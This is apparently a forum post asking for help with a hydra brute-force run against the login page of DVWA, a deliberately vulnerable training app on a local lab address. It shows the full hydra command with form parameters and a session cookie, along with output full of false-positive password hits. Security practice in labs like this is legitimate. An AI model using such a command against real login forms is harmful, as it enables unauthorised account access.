30Eyl
Brute forcing the brute force page on DVWA v1.0.7 using hydra
I am trying to brute force the brute force log-in page on DVWA v1.0.7 (/dvwa/vulnerabilities/brute/)
I have been working on this for quite some time but I keep getting a bunch of false positives when I use a wordlist I created and when I use the rockyou.txt.gz file, hydra just keeps going on and on without any results.
hydra 192.168.10.4 http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=^Login^:F=username and/or password incorrect.:H=Cookie:security=low; PHPSESSID=a3e7228ab3c6fd126a8c2c752f00dfb9" -L username.txt -P passwords.txt
This is the result I get
[80][http-get-form] host: 192.168.10.4 login: admin password: sdkjfbid
[80][http-get-form] host: 192.168.10.4 password: knfbjenh b
[80][http-get-form] host: 192.168.10.4 password: kfbiej
[80][http-get-form] host: 192.168.10.4 password: nvbjdfhvbkj
[80][http-get-form] host: 192.168.10.4 password: hytv
[80][http-get-form] host: 192.168.10.4 password: sdkjfbid
[80][http-get-form] host: 192.168.10.4 password: password
1 of 1 target successfully completed, 48 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-09-30 07:14:16
Is there something I am missing?
